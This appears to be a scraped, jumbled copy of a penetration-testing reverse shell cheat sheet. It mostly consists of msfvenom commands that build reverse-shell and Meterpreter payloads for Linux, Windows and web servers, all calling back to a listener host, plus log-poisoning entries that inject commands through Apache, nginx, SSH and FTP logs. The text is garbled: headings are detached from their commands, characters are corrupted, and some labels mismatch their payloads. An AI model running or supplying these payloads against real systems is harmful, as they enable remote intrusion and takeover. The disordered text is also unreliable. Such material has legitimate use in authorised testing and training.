


X86 - Shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf X64 - Shell msfvenom -p windows/圆4/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Linux Payloads X86 - Shell msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe X64 - Meterpreter msfvenom -p windows/圆4/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe X86 - Meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe
Netcat reverse shell cheat sheet windows#
X64 - Shell msfvenom -p windows/圆4/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Windows Listener Metasploit Multi Handler X86 - Shell msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx Windows Payloads Msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.jsp ASPX Payload Msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar > reverse.jar JSP Payload Msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war > reverse.war JAR Payload Web Payloads PHP Payload msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php War Payload ' > /tmp/t.go & go run /tmp/t.go & rm /tmp/t.go Telnet var/log/apache2/access.log /var/log/nginx/access.log curl -s -H "User-Agent: " "" User-Agent: /var/log/apache2/access.log&cmd=id /var/log/nginx/access.log&cmd=id Server Side Template Injection Log Poisoning SSH /var/log/auth.log ssh /var/log/auth.log&cmd=id Log Poisoning FTPįtp> /var/log/vsftpd.log&cmd=id Log Poisoning HTTP As such they’re quite short lines, but not very readable. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.Įach of the methods below is aimed to be a one-liner that you can copy/paste. The examples shown are tailored to Unix-like systems. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. If it’s not possible to add a new account / SSH key /. If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
Netcat reverse shell cheat sheet software#
This is a verbatim copy of because it is tagged as unwanted software by Google Safe Browsing and just in case… Reverse Shell Cheat Sheet
